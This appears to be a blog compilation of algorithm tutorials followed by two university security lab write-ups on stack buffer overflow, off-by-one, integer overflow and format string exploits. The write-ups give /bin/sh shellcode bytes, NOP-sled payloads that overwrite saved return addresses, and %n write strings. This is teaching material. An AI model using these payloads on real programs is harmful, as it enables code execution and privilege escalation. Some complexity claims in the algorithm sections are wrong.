Dynamic Programming

Introduction

Dynamic programming is closely related to divide & conquer and has far-ranging applications. They share the same idea of dividing a bigger and complicated question into smaller and easy-to-solve sub-problems of the same type. So both of them are based on recursion.

The difference: In divide & conquer, sub-problems share the same type with the original problem, but every sub-problem is not totally the same. (For example, when doing merge sort, we split the input array into left-half and right-half and sort them individually. The subproblem, sorting the left-half and right-half array, is the same with the original problem; the only difference is that the input array’s length becomes halved. But sorting the left-half and sorting the right-half is not usually the same problem.) In dynamic programming, we will have exactly the same sub-problem occur multiple times. To avoid solving the same sub-problem more than once, we can memorize each sub-problem result, and before solving one, we check if the same problem has been solved before. Thus every distinct sub-problem will be solved at most once.

To solve a problem using a dynamic programming approach, we normally need a 1-d, 2-d, or more complex array. We also have to figure out what’s the meaning of each block in that array and how later blocks connect to the previous one.

Comparing to divide & conquer, dynamic programming might have less time complexity but usually need more additional space because of memorization.

Fibonacci numbers

Computing the Fibonacci numbers is a classic and straightforward problem, where dynamic programming can be applied.

Referring to the wiki page, the nth Fibonacci number Fib(n) is the nth number in the Fibonacci series. Its definition:

and for n > 1:

The beginning of Fibonacci series:

Our problem is to compute the nth Fibonacci number:

Computing nth Fibonacci number
input: a integer N>=0
output: the N th Fibonacci number

Imagine we’d like to compute Fib(5). By definition, Fib(5) = Fib(4) + Fib(3) and the problem becomes computing Fib(4) and Fib(3). We can continue doing this until getting Fib(0) and Fib(1):

                           fib(5)   
                     /                \
               fib(4)                  fib(3)   
             /        \              /       \ 
         fib(3)      fib(2)       fib(2)     fib(1)
       /     \       /    \        /    \
  fib(2)   fib(1)  fib(1) fib(0) fib(1) fib(0)
 /      \
fib(1) fib(0)

The native method to compute this will be computing all nodes on the above graph, a simple divide & conquer algorithm. In this case, the number of node we need to compute is O(2^logn).

However, you might notice that some sub-problem is exactly the same. For example, Fib(3) appears 2 times, Fib(2) appears 3 times and Fib(1) appears 5 times. If we can memorize distinct nodes with their result, we only need to compute O(n) nodes. Also notice that the extra space needed here is also O(n).

                           fib(5)   
                     /                \
               fib(4)                  fib(3)   
             /        \            
         fib(3)      fib(2)       
       /     \          
  fib(2)   fib(1)   
 /      \
fib(1) fib(0)

The pseudocode of Fib(n):

Algorithm computing nth Fibonacci number

int Fib(n) {
  int fibSeries[] <-- initializing an array of size n + 2 
  fibSeries[0] = 0
  fibSeries[1] = 1
  for i from 2 to n+1
    fibSeries[i] = fibSeries[i - 1] + fibSeries[i - 2]
  return fibSeries[n+1]
}

One technique often used in dynamic programming is building a 1-d, 2-d, or more complex array to store the result of every distinct sub-problem; arrange the sub-problems in order from simpler to complicated, and solve them(fill the array) in that order.

Longest Increasing Subsequence

Longest Increasing Subsequence
input: an array of integer
output: the longest increasing subsequence

Subsequences: From a sequence, any of the element but in sequence.

For example, consider sequence 0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15

The longest increasing subsequence is 0, 2, 6, 9, 11, 15

Usually, a useful technique to help us think about dynamic programming problems is considering the last element.

Here, we can fix the last element in the sequence, 15, and we have two choices: either 15 is in our longest increasing subsequence, or it is not. If we decide to exclude 15, the question becomes to find the longest increasing subsequence from remaining elements. If we include 15, since it is the last element, the question becomes to find the longest increasing subsequence from remaining elements with the last element less than 15. So fixing one end (the last of subsequence) seems to work.

Let P(n): the longest increasing subsequence of array arr[1...n] end with arr[n]
P(n) = max(P(1), ..., P(i-1)) + arr[n], for all  1<=i<=n-1 and arr[i] < arr[n]
LIS(arr[1...n]) = max(P(1), ..., P(n))

*LIS stands for the longest increasing subsequence

Now, it looks similar to Fibonacci number since the later value depends on previous ones: to compute P(2), we need P(1), to compute P(3), we need P(2) and P(1), to compute P(n), we need P(1), …, P(n-1). Since the same subproblem raises over and over again, memorization is a plus.

So we will have an array p[1…n] where p[i] stores the LIS end with arr[i]. Since the later value depends on earlier values, we can fill the array from the beginning.

Algorithm find LIS
int LIS(arr[1...n]) {
  p[1...n] <-- initialize empty array
  p[1] = 1 // base case
  for i from 2 to n
    p[i] = max(p[j]) + 1 for j from 1 to i-1 and arr[j] < arr[i]
  return max(p) // return the largest element in p[1...n]
}

We are using two loops here, so the time complexity will be O(n^2). Also, O(n) space is used to store array p[1…n].

Have fun!

Divide & Conquer

Introduction

Divide and conquer is a basic but powerful technique that is widely used in many algorithms. As you might speculate from its name, the principle of divide and conquer is to recursively divide a complicated problem into a few simple sub-problems of the same type (divide), until they become simple enough and we can solve them quickly (conquer); finally we will combine the sub-result to get the final result. Thus, we’ll usually use recursion when we want to use the divide and conquer algorithm.

Merge Sort Algorithm

Merge Sort is a classic divide and conquer algorithm; let’s look at its program specification:

Algorithm: merge sort
input: an array arr[] of comparable element
output: sorted version of the input array, ascending

In merge sort, we’ll apply the divide and conquer idea. Divide: we’ll recursively divide the array into two-parts until we can not divide anymore. At this time, all sub-arrays contains only one element; therefore, they can be considered as sorted array. Conquer: now, the question becomes how to merge two sorted arrays (left-half and right-half) into a single sorted array; this is easy and can be done with O(n) time. To make it clear, we can have another function called merge:

Algorithm: merge
input: two sorted array arr1[], arr2[] of comparable element
output: one sorted array, ascending 

And we can write the pseudocode for merge sort:

arr[] mergesort(arr[]) {
  if (the length of arr[] is 1)
    return arr[]
  left[] <-- copy the left half of arr[]
  right[] <-- copy the right half of arr[]
  left[] = mergesort(left[])
  right[] = mergesort(right[])
  return merge(left[], right[])
}

Here is an concrete example from GeeksforGeeks with every step shown in order, assuming our input array is [38, 27, 43, 3, 9, 82,10]:

Algorithm analyze

Time Complexity: Let n be the number of element in our input array. Since we are recursively dividing the array into two-part, the height of the tree will be 2log(n). Consider every level before merging (the upper log(n) levels), all we do is splitting the current array into left-half and right-half, which can be done with O(n) time. Consider every level after merging (the lower log(n) levels), what we do is merging two sorted arrays, this can be done with two pointers within O(n) time. To sum all these up, the total time complexity is O(n*logn)

Space Complexity: we will need O(n) extra space to store the left-half and right-half sub-arrays we created at any time. If we also want to consider the space used by recursive calls, we need to add extra O(logn) space for the stack frames. Thus, the total space complexity is O(n) +O(logn)

Conclusion

Similar to merge sort, other classic algorithms like binary search, quick sort, closest pairs in 2-d space also use the idea of divide & conquer algorithm. Two things need to be noticed here: 1. the subproblems are easier to solve than the current problem; in other words, dividing need to reduce the difficulty of the problem. 2. The subproblems need to be in the same format so that they can be solved similarly and efficiently, which will be time-saving.

Interestingly, what if the same subproblem occurs multiple times during division? In that case, another algorithm, dynamic programming, similar to divide & conquer, can be applied. We’d like to remember the state/result of the subproblem and only solve the same subproblem once instead of multiple times.

Have fun!

Introduction to Algorithm

In computer science, an algorithm is a sequence of well-defined instructions to solve a problem, usually within a finite amount of time and space. And it is an essential and indispensable part of computer science, theoretically and practically.

Here’s a rough schedule of what will be discussed in this topic:

  • Basic Graph Algorithms
    • Breadth-first search & Depth-first search
    • Dijkstra’s shortest path
    • Floyd-Warshall algorithm
    • Prim’s algorithm
  • Divide & Conquer
    • Merge Sort
  • Dynamic Programming
    • Longest Increasing Subsequence
    • Knapsack
    • Travelling Salesman Problem
  • Greedy
  • Network Flow
  • NP Optimization

Program Correctness

What is a program? A program, the implementation of an algorithm, is a sequence of instructions that are used to solve a problem or do some calculations. It always comes with specifications, including input and output. The process of getting output from the input is considered as a program.

Before getting started, we will discuss some basics of an algorithm: program correctness, a method helps us to verify if an algorithm is correct or not.

Program correctness sometimes has been split into two parts: soundness and termination.

  • Soundness: on every valid input, if program terminates, then its output is correct.
  • Termination: on every valid input, the program terminates.

This is important as we will frequently use it to determine if our algorithm is correct. One technique that is helpful to prove program correctness is mathematical induction. If you are interested, here are more examples provided by Cornell.

Remember, algorithm can be intriguing and fun to exploit! Good luck and have fun!


Credit

Some material in this topic is selected from the coursework of CS577: Introduction to Algorithm and ICPC training material written by Prof. Van Melkebeek @ University of Wisconsin-Madison.

Format String Vulnerability

This is the second part of our buffer overflow topic, visit the first part if you need some background information. In this part, we’ll see what’s the format string vulnerability and how we can use make use of it to exploit a program. This part is more challenging since it requires additional knowledge about the format string and how we can use its feature to reach our goal.

a. Intro to format string

The format string should be familiar to us; we’ll use it to print stuff to console in c/c++ program. Common format functions are fprintf, printf, sprintf, snprintf, etc. We will focus on printf and snprintf here. Look at the example below:

void PrintName (char *name) {
  printf("My name is %s", name);
}

The format string here is “My name is %s”, where %s is a specifier for string of characters. The stack virtualization looks like:

top of stack                                                bottom of stack
lower memory                                                  higher memory
[--printf() function frame--][-ebp-][-eip-][--params--][--PrintName func frame--]
                                           [&str|&name]
* &str is the address of the format string ("My name is %s")
* &name is the address of the name

Notice there are two params in printf function in this case: a format string and a string. What if there are 10 params in this function, how does printf retrieve them? Inside printf function, there is an internal pointer that initially points to the second param. When encountering a format specifier, the function will retrieve the corresponding param, and the internal pointer will move towards the bottom of the stack. Another concrete example:

printf("Numbers: %d, %d", 5, 6);

It’s stack and internal pointer look like:

top of stack                                           bottom of stack
lower memory                                             higher memory
[--------function frame--------][-ebp-][-eip-][--params--][...]
                                              [&str][5][6]
                                                     ^ (internal pointer
                                                        starts here)
* &str is the address of the format string

This is helpful since we might want to increase this internal pointer in the later discussion.

These print functions work great if we follow their design (one format specifier with one param). But we can play around with these functions and make exploits. The idea of exploit/vulnerability is we only provide the format string but no or fewer params. Let’s see what we can do in this case.

b. Crash of the program

What if the format string is provided by the user, and we can change it to whatever we want. One vulnerability here is, by designed input, we can crash the program. Consider the case:

void foo (char *name) {
  printf("%s%s%s%s%s%s%s%s%s%s\n");
}

Because “%s” will display strings on the stack and we have 10 %s here, the foo() function will look at the stack and try to retrieve 10 parameters, interpret them as strings and display them. But we haven’t supply any string, the function doesn’t know this and will still retrieve 10 parameters as if our string exists. This means printf function will start from the internal pointer, interpret it as a string and move the pointer upward and interpret the next one until all ten %s has been processed. These “string” are other data on the stack. If we have enough %s specifier, printf function might reach data from illegal address (data under the internal pointer is read-only or out of scope), and then the program will crash.

c. Viewing the memory

By using the same trick, we can view the process memory, just like in dgb

printf ("%08x,%08x,%08x,%08x,%08x\n");

“%08x”, like “%s”, is a specifier to display data as 8-digit padded hexadecimal numbers. “,” is just a seperater. We might get something like:

40012980,080628c4,bffff7a4,00000005,08059c04

Here, we can use “%08x” to increase the interal stack pointer of the format function towards the top of the stack by 4 bytes. Why? Look at the virtualization of the stack:

top of stack                                           bottom of stack
lower memory                                             higher memory
[<------------------------------------------------------------stack]
[------print function frame------][ebp][eip][params][Caller's frame]
                                           [-&str-][...]
                                                   ^ (internal pointer
                                                      starts here)

In the earlier example, we have corresponding params (for example, name for %s). After reading the format string, the internal pointer will retrieve the value and moves to the next memory address when encountering a specifier. Here we don’t have other params on the stack, but we have “%08x”. In this case, the internal pointer will start at the Caller’s frame and moves toward the bottom of the stack by 4 bytes for each %08x.

d. Writing to an arbitrary address

Another tool we will use is the format specifier, “%n”, this will print the number of characters in printf() before the occurrence of %n, for example:

int i;
printf("12345%n\n", &i);
printf("value of i is: %d\n", i);
return 0;

Result: 12345
        value of i is 5 (before %n, there are 5 chars)

More examples can be found at tutorialspoint.

Our final goal is to change the saved return address so that our shellcode can be executed. And here, by using %n, we are allowed to write to an arbitrary address, which means we can change the saved eip, and the problem is solved.

In the above example, we successfully write the number 5 to the address of variable i. Image what if the argument ‘&i’ doesn’t exist, like 4.b and 4.c. We will write the number 5 to the address pointed by the internal pointer. Since we can move that pointer towards the bottom of the stack, we are likely to let the internal pointer points to the exact address of the saved eip. And now we can change the value of eip to whatever we want by using %n.

But the first big question is that the address is usually a large number, e.g., say 0xbfffffca is the address of the shellcode. If we want to change the saved eip to this value, by the above naive method, we have to insert 3221225418 chars before %n. However, it’s nearly impossible to have a buffer in such a huge size.

One method we can use here is that, instead of having the real characters before %n, we can use another format specifier as a “place holder.” For example:

int a;
printf("%10d%n", 1024, &a);
printf("value of a is: %d");

Result: 
      1024
value of a is: 10

Here, %10d means to read the coordinate argument, which is 1024, and print it as a 10 digit integer. It doesn’t matter if the argument has 10 digits or not; any number(2048/123/…) is ok. Since before %n, we have 10 digits(chars), we can see that the value of ‘a’ will be set to 10 in this case. So by this method, we can set the value that %n will print to a large number, but we don’t actually need to have that much number of chars before %n. Also, notice that any specifier, %10f, %10u, %10x are all workable here.

But the above method also has a limitation. It still can’t handle numbers that are too big, e.g., the 4-byte memory address.

There are two solutions here. One solution is that if the address of saved eip is close to our shellcode, we don’t need to change all 4 bytes of address. For example, 0xbfffffca -> 0xbffffeca, since the first 2 bytes are the same, we only need to change 2 bytes here. And by the above method, we calculate 0xfeca = 65226, and we are good to go.

Another solution is that we can change 1 byte at a time, and after 4 changes, we can change the saved eip to the value we want. But there are 2 points we need to be careful: 1) %n is cumulative, later %n write will counter all chars before it.

int a,b,c,d;
printf("%10d%n%20d%n%30d%n%40d%n", 1024, &a, 1024, &b, 1024, &c, 1024, &d);

Result: 
a:10  b:30  c:60  d: 100

2) every change to a memory location is always 4 bytes.

It might be confusing since we want to change 1 byte once but every change is 4 byte. Let’s assume the internal pointer has already pointed to the address we’d like to modify and look at the following example:

printf("%10d%n%20d%n%30d%n%40d%n")

We’ll have 0A1E3C64 (hex representation) under to the internal pointer.

Thus, we can use this method to write a 4-byte address into the stack. For example, to write bffffca4, we write a4 fc ff bf to the internal pointer (little-endian). “%164d%n%88d%n%3d%n%192d%n” should work here. Using the overflow trick if the later one is smaller. For example, bf < ff, we replace 0xbf to 0x1bf and 1 will overflow.

e. Example

Now, let’s apply all we learned before. Look at the following example target code:

int foo(char *arg)
{
  char buf[480];
  snprintf(buf, sizeof buf, arg);
  return 0;
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "target5: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  foo(argv[1]);

  return 0;
}

The snprintf() function formats and stores a series of characters and values in the array buffer. But the input string is under the user’s control, making format string exploit possible.

My exploit design/ input string layout: 4*<address-dummy pair><stackpop><write-code><NOPS><shelllcode>:

<address-dummy pair>: “\x9c\xfc\xff\xbf\x01\x01\x01\x01”, an address that we want to modify in one byte. Since later we will use %d%n, we need a dummy value between address to make sure
no address here will be skipped.

<stackpop>: “%08x”, this will increase the internal pointer by 4 bytes. In printf function, we want this pointer point to the first ADDR, or the beginning of the buffer where our address-dummy pairs located. Try several times we can know how many bytes we need to skip. (Here, we need 2 to skip ebp and eip)

<write-code>: in form %xd%n *4, where x is an integer. We need four of this since we need to write to four different addresses, 1 byte each time.

And we want to insert some NOP before SHELLCODE to increase flexibility. Combining all of them, we’ll get the designed input string to exploit the target. Full exploit code can be found in my Github repo at the end.

Example codes are selected from the coursework of COMPSCI642: Introduction to Information Security taught by Prof. Earlence Fernandes @ the University of Wisconsin-Madison.

Thanks for reading! Now we’ve finished all of our discussion about buffer overflow and format string vulnerabilities. Any comments or suggestions will be appreciated.

Kai

Buffer Overflow Vulnerability & Exploits

0. Getting started

Here is some discussion about the buffer overflow. This article is the first part and it will discuss basic smashing the stack and integer overflow vulnerabilities followed by sploit examples.

The second part will discuss format string vulnerability and exploits in details, you can find it here.

Before getting started, I’d like to recommend two papers that I found helpful:

  1. Smashing The Stack For Fun And Profit by Aleph One 
  2. Exploiting Format String Vulnerabilities by scut/team teso

Also, there might have mistakes in the following discussion; you can either report as comments or email me directly. Thank you.


1. Intro to buffer overflow

a. What is buffer overflow?

The basic idea of buffer overflow: we may edit/overwrite some data after the buffer.

Here is the setting: on the stack, we have a buffer of fixed size (Typically, this buffer is designed to store user input data.) Consider the case:

// typical programming error of string copy without boundary checking
// input: user input
void foo(char *input)
{
  char buf[4]
  strcpy(buf, input)
  ...
}

In the above case, we have a buffer of 4 bytes on the stack and waiting to store user inputs. What if the input size is greater than 4 bytes? Since strcpy function doesn’t have boundary checking, we can overwrite some data on the stack. Assuming our input string is “\x55\x55\x55\x55\x55”, which is 5 bytes, and the buf is allocated at 0xbfffff00. Below is the virtual representation of the stack:

[    buf    ][memory on stack]
[bfffff--   ][bfffff--       ]
[00|01|02|03][04|...         ]
[55|55|55|55][55|...         ]

The buffer is 4 bytes, but we will write 5 bytes into the stack; one more byte at 0xbffff04 has been modified here.

b. How to make use of this vulnerability?

But what are the consequences if the memory in the stack can be modified? We can crash the program easily by filling the stack with meaningless bytes. But sometimes, as attackers, we may also want to change the functionality of the program.

Essentially, we’d like to insert a piece of code (it’s called shellcode) that do things we want into the stack and manage to run it. The question here is how do we change the workflow so that the program execute the code we inserted. Here, some basic knowledge of the memory/stack layout may be helpful to understand how do we achieve this goal.

Below is a common memory layout of C program, we have stack growing downward and heap growing upward.

lower memory                                        higher memory
[--text--][--data--][heap-------->][<--------stack][--argv/env--]

Consider the following code:

void foo(char *input)
{
  char buf[4]
  strcpy(buf, input)
  ...
}
int main(int argc, char *argv[])
{
  ...
  foo(argv[1]);
  ...
}

We have stack layout

Stack layout:
lower memory                         higher memory
[<------------------------------------------stack]
[--------foo--------][-ebp-][-eip-][-params-][...]
[.........|---buf---]

Notice that after the foo frame, we have saved %ebp and %eip register, where %ebp is the saved base pointer, and %eip is the saved instruction pointer. The one we are interested in is %eip register since it contains the instruction pointer that will be executed next after foo function finished, and if we can edit it, we may decide which insruction the program will run next. Therefore, we can redirect the workflow of the program to run our shellcode.

c. How to design the attack?

With the current settings, we have two goals: 1. writing the shellcode that we want to execute; 2. modify the %eip register located on the stack to let it points to the beginning of our shellcode.

Here, I won’t go into too many details of how to write the shellcode. Some basic ideas of shellcode are: 1. it should be short enough to fit into the buffer; 2. to hide our activity, the program should exit normally instead of reporting errors; 3. One common goal is to gain the root permission (some preconditions are needed). This can be achieved by execve() system call. Below is the shellcode we are going to use. If you are interested in the details, read the article written by Alpha one.

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b
 \x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd
 \x80\xe8\xdc\xff\xff\xff/bin/sh"

Looks great. The question now becomes how do we modify the %eip register to let it points to the beginning of our shellcode so that when the function returns, our shellcode can be executed.

Since we are dealing with a program that is written by others, it’s hard to figure out exactly where the buffer is allocated in the memory space. Intuitively, it is easier to guess an address in 32-bit architecture than in 64-bit. Here, for simplicity, assuming we are dealing with 32-bit architecture with ASLR (address space layout randomization) turned off.

One technique we can use here is adding NOP sleds(0x90 in machine code) before our shellcode. Since NOP sleds do nothing, instead of redirect to the exact beginning location of the shellcode, we can now redirect to anywhere in the NOPs, so that the chance of guessing correctly is higher.

In conclusion, our sploit code is composite by these three elements: NOPs, shellcode, and an return address.


2. Smashing the stack

Look at thNow, we should have a basic understanding of what is the buffer overflow and how does an exploit look like. Let’s look at a simple example below:

int check_fail(char *name)
{
  char buf[20];
  strcpy(buf, name);
  /* 
   * Assume theres some useful
   * function here to check if 
   * a student has failed.
   */
  return 1;
}

int main(int argc, char *argv[])
{
  char grade;

  if(argc != 2) {
      fprintf(stderr, "target0: argc != 2\n");
      exit(EXIT_FAILURE);
  }
  
  if(check_fail(argv[1]))
    grade = 'F';
  else
    grade = 'A';

  fprintf(stdout, "Grade = %c\n", grade);

  return 0;
}

Since this target uses strcpy, which copies a string without boundary checking, we can use the technique mentioned above to perform the smash-the-stack attack.

Instead of gaining the root permission, our goal is simple here: we want to change the grade from F to A. How to achieve this goal?

Remember that through the buffer overflow, we can freely change any data in the stack that has a higher memory address than the buffer. As mentioned before, we want to change the return address. Here, after function check_fail(), the program will continue at line 22 (the if statement), so that our grade will be assigned to F. But if we can skip the if statement, and modify the return address to line 25, our grade will be assigned to A.

Since we assume that ASLR is off, the check_fail function will start with the same address every time. Let’s try to input an empty string to find the memory layout:

By using gdb, we break at function check_fail(). We can see that the values in %esp and %ebp are 0xbffffe40 and 0xbffffe68. Recall %esp is the stack pointer (stores the address of the top of the stack), and %ebp is the base pointer (stores the address of the bottom of the stack). We have:

top of stack                                           bottom of stack
lower memory                                             higher memory
[<--------------------------------------------------------------stack]
[----------------0xbffffe---------------]
[4|4|4|4|...                  ...6|6|6|6]      
[0|1|2|3|...                  ...5|6|7|8]
[------check_fail() function frame------][-ebp-][-eip-][-params-][...]

Since we know the check_fail() function frame ends at 0xbffffe60 and %ebp & %eip is next to it, we can compute the address of %eip: 0xbffffe68 + 4 bytes (skip %ebp) = 0xbfffe6c is the address of %eip. We can check, in the gdb, if our calculation is correct.

Looks great! Since 0x08048513 is the next instruction, we find the correct address of %eip. And it starts 4 bytes after check_fail() function frame. Now we can try to figure what should our input so that we can change the value of %eip.

Apply what we discussed before to this case, the buffer size is 20 byte and we want to overwrite the %eip that starts 4 bytes after the buffer, so we’d like to have a input string of 28 bytes and the last 4 bytes should be 0x0804851d (this is the address of assemble code that assign grade to A, check the image above). The last thing we should be careful is we don’t want the program to crash, so we should keep the value of saved %ebp unchanged. Therefore, our final input should be (little endian):

[NOPs(20 bytes)][ebp(4 bytes)][eip(4 bytes)] 
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\xc5\xff\xff\xbf\x1d\x85\x04\x08

Great! Let’s look at another example that is a little more complicated:

int bar(char *arg, char *out)
{
  strcpy(out, arg);
  return 0;
}

int foo(char *argv[])
{
  char buf[160];
  bar(argv[1], buf);
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "target1: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  foo(argv);
  return 0;
}

Our goal here, except changing the value of saved eip on the stack, we also want to gain the root authority, so the shellcode mentioned before is needed in this case.

We have the same idea here, our input strinWe have the same idea here; our input string should be composited in the form “<NOPs><shellcode><modified eip>”, and it length should be 168. Notice here since the shellcode helps us to exit normally, we don’t need to include %ebp here.

Usually, we need to guess the address of the buffer in the memory, so we have NOP sleds here is to increase the chance of guessing correctly. But since ALSR is off, by using gdb, we can figure out the exact address, and the NOPs in the input can be treated as space holders.

By applying the same procedure, it’s not hard to find out what should our input string be. Maybe try this by yourself. The answer can be found in my github repository; you can follow the link at the end.


Now, having the idea of exploiting, we are ready to see a few examples that might be challenging.

void nstrcpy(char *out, int outl, char *in)
{
  int i, len;

  len = strlen(in);
  if (len > outl)
    len = outl;

  for (i = 0; i <= len; i++)
    out[i] = in[i];
}

void bar(char *arg)
{
  char buf[160];

  nstrcpy(buf, sizeof buf, arg);
}

void foo(char *argv[])
{
  bar(argv[1]);
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "target2: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  foo(argv);
  return 0;
}

Think about the above code for a while; do you see where the vulnerability is?

In function bar(), it uses user-defined-function nstrcpy() instead of library-function strncpy(). And there is a programming error in nstrcpy(). Look at line 9; the boundary checking is wrong since it will copy one more bytes than it is supposed to be.

But the question is, how do we make use of this error? It seems like, with one-byte overflow, we cannot modify the save eip value on the stack (since eip starts at 4 bytes after the buffer). But recall what is next to the buffer? Saved %ebp. It turns out that we can modify the least significant byte of it. Think about what byte value we should overwrite here to make our sploit works.

Here, the idea is, we want the saved ebp contains an address located in our buffer. Since ebp is next to our buffer (they are close in address space), and by changing the least significant bit, we have a high chance to achieve that.

Now comes the tricky part, since when the function returns, it will retrieve the saved ebp and eip based on the current ebp. (If this is unfamiliar, you might want to review how the function call works in assembly, here is a good explanation of function call procedure by Prof. Remzi H. Arpaci-Dusseau @ University of Wisonsin-Madison). The virtual representation might also be helpful:

top of stack bottom of stack
lower memory higher memory
[<---------------------------------------------------------stack]
[-------bar() function frame-------][-ebp-][-eip-][-params-][...]
[...<fake ebp><fake eip><shellcode>]                           

We want the saved ebp points to the address of the faked ebp, and faked eip points to our shellcode. So that when the function bar() returns, the current %ebp will point to the beginning address of the faked ebp. Then, when the function foo() returns, it will retrieve faked ebp and faked eip as saved ebp and eip. And since faked eip points to our shellcode, it can be executed.

So our input string will be composited in the form “<fake ebp><fake eip><NOPs><shellcode><least significant bit>” and its size should be 161. Fake eip should point to somewhere between NOPs. With ASLR off, we can calculate the exact address as before.


3. Integer overflow

Now, we’ve finished talking about the basic buffer overflow. Let’s move to the integer overflow. Look at the piece of code below:

size_t len = read_int_from_network();
char *buf;
buf = malloc(len + 5);
read(fd, buf, len);

What if len is a huge number, e.g., 0xFFFFFFFF? Then, we will allocate a buffer with a size of 4 (integer overflow: len + 5 = 4), but read a lot of data in that buffer.

Also, we might use this vulnerability to exploit the program, look at the example below:

struct widget_t {
  int x;
  int y;
  double z;
};

#define MAX_WIDGETS 160

int foo(char *in, int count)
{
  struct widget_t buf[MAX_WIDGETS];

  if (count < MAX_WIDGETS) 
    memcpy(buf, in, count * sizeof(struct widget_t));

  return 0;
}

int main(int argc, char *argv[])
{
  int count;
  char *in;

  if (argc != 2)
    {
      fprintf(stderr, "target3: argc != 2\n");
      exit(EXIT_FAILURE);
    }

  /*
   * format of argv[1] is as follows:
   *
   * - a count, encoded as a decimal number in ASCII
   * - a comma (",")
   * - the remainder of the data, treated as an array
   *   of struct widget_t
   */

  count = (int)strtoul(argv[1], &in, 10);
  if (*in != ',')
    {
      fprintf(stderr, "target3: argument format is [count],[data]\n");
      exit(EXIT_FAILURE);
    }
  in++;                         /* advance one byte, past the comma */
  foo(in, count);

  return 0;
}

Focus the code at line 13-14, count is the user input value, MAX_WIDGETS is 160 here; the program says if count is less than 160, copy count * 8 (size of struct is 8 here) bytes from input to buf.

How do we make use of the Integer Overflow vulnerability here? Since count is a signed integer, with a leading 1 (in binary representation), it will be interpreted as a negative number when comparing with MAX_WIDGETS. After multiplying with 16, the leading 1 overflows, and the result is our input size.

This is a good source to learn more about the integer overflow if you are interested.

Example codes are selected from the coursework of COMPSCI642: Introduction to Information Security taught by Prof. Earlence Fernandes @ the University of Wisconsin-Madison.

Kai